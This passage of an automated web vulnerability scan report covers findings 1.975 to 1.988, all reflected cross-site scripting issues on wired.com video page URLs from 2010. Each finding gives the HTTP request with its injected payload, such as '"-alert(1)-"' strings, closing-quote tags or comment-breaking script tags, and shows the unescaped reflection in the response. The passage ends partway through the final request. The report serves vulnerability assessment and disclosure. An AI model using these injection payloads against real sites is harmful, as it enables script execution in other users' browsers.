1.975. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1afea"><a>5e215e36fac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos1afea"><a>5e215e36fac/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=274
Expires: Mon, 22 Nov 2010 00:46:53 GMT
Date: Mon, 22 Nov 2010 00:42:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos1afea"><a>5e215e36fac c_highlights">
...[SNIP]...

1.976. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 321c9"-alert(1)-"464fbd33c85 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos321c9"-alert(1)-"464fbd33c85/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=276
Expires: Mon, 22 Nov 2010 00:47:41 GMT
Date: Mon, 22 Nov 2010 00:43:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "cowboys-and-aliens-trailer","681412282001","1716440574","highlights","video","latest-videos321c9"-alert(1)-"464fbd33c85"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.977. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5318"-alert(1)-"fd2d86b2125 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlightsd5318"-alert(1)-"fd2d86b2125/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=282
Expires: Mon, 22 Nov 2010 00:48:56 GMT
Date: Mon, 22 Nov 2010 00:44:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106764


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "cowboys-and-aliens-trailer","latest-videos","681412282001","highlightsd5318"-alert(1)-"fd2d86b2125","1716440574","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.978. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4491f"><a>9cbbc7d96ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/highlights4491f"><a>9cbbc7d96ba/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:48:12 GMT
Date: Mon, 22 Nov 2010 00:43:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_highlights4491f"><a>9cbbc7d96ba">
...[SNIP]...

1.979. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0ecf"-alert(1)-"04fbf34cd7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574b0ecf"-alert(1)-"04fbf34cd7d/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:30 GMT
Date: Mon, 22 Nov 2010 00:44:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "cowboys-and-aliens-trailer","latest-videos","681412282001","1716440574b0ecf"-alert(1)-"04fbf34cd7d","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.980. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f802"-alert(1)-"db921583906 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer4f802"-alert(1)-"db921583906/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:58 GMT
Date: Mon, 22 Nov 2010 00:44:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "cowboys-and-aliens-trailer4f802"-alert(1)-"db921583906","latest-videos","681412282001","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.981. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 257cc"-alert(1)-"009132a34db was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001257cc"-alert(1)-"009132a34db HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=275
Expires: Mon, 22 Nov 2010 00:49:50 GMT
Date: Mon, 22 Nov 2010 00:45:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "681412282001257cc"-alert(1)-"009132a34db","cowboys-and-aliens-trailer","latest-videos","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.982. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7e5d9--><script>alert(1)</script>896031a1734 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video7e5d9--><script>alert(1)</script>896031a1734/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29471
Vary: Accept-Encoding
Cache-Control: max-age=287
Expires: Mon, 22 Nov 2010 00:47:35 GMT
Date: Mon, 22 Nov 2010 00:42:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video7e5d9--><script>alert(1)</script>896031a1734/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001
-->
...[SNIP]...

1.983. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45aaf"><a>68a6a917189 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video45aaf"><a>68a6a917189/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29436
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:07 GMT
Date: Mon, 22 Nov 2010 00:42:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video45aaf"><a>68a6a917189 ss_latest-videos c_highlights">
...[SNIP]...

1.984. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f13c4"-alert(1)-"79997b02692 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videosf13c4"-alert(1)-"79997b02692/highlights/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:16 GMT
Date: Mon, 22 Nov 2010 00:44:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106771


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videosf13c4"-alert(1)-"79997b02692","disneys-cars-2-goes-international","677756918001","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.985. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e5c"><a>188f8a9d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videosc9e5c"><a>188f8a9d4e/highlights/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:56 GMT
Date: Mon, 22 Nov 2010 00:42:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videosc9e5c"><a>188f8a9d4e c_highlights">
...[SNIP]...

1.986. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f024"><a>62c7cdde06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/highlights5f024"><a>62c7cdde06/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:26 GMT
Date: Mon, 22 Nov 2010 00:44:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_highlights5f024"><a>62c7cdde06">
...[SNIP]...

1.987. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e35b7"-alert(1)-"02dcf902f19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlightse35b7"-alert(1)-"02dcf902f19/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=288
Expires: Mon, 22 Nov 2010 00:50:38 GMT
Date: Mon, 22 Nov 2010 00:45:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106725


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","disneys-cars-2-goes-international","677756918001","1716440574","highlightse35b7"-alert(1)-"02dcf902f19","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.988. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59286"-alert(1)-"69a9f6b985b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/171644057459286"-alert(1)-"69a9f6b985b/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
